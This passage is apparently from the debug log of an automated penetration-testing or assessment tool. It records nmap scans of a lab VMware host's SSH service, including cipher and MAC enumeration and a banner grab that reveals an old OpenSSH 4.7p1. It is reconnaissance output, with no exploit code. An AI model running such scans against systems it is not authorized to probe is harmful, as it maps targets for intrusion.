|       aes256-cbc
|       rijndael-cbc@lysator.liu.se
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|   mac_algorithms: (7)
|       hmac-md5
|       hmac-sha1
|       umac-64@openssh.com
|       hmac-ripemd160
|       hmac-ripemd160@openssh.com
|       hmac-sha1-96
|       hmac-md5-96
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
MAC Address: 00:0C:29:25:59:EA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds



2016-10-13 20:10:04,909 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:10:04,952 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_6  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:10:04,953 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_6  Message --> :Thread started --with command nmap -sV --script=banner.nse -p 22 192.168.179.136
2016-10-13 20:10:06,674 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_6  Message --> :Thread finished
2016-10-13 20:10:06,675 - Commands Logger - DEBUG - Command Logger --->Command id --> ssh_6  Message --> :Saving details :
2016-10-13 20:10:06,676 - Commands Logger - DEBUG - Command id is ->ssh_6
2016-10-13 20:10:06,676 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=banner.nse -p 22 192.168.179.136', '\nEnd']
2016-10-13 20:10:06,676 - Commands Logger - DEBUG - My var : '$.Entries."ssh_6"'
2016-10-13 20:10:06,677 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=banner.nse -p 22 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:10 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00030s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
MAC Address: 00:0C:29:25:59:EA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds



2016-10-13 20:10:06,680 - Commands Logger - DEBUG - Finished!!!
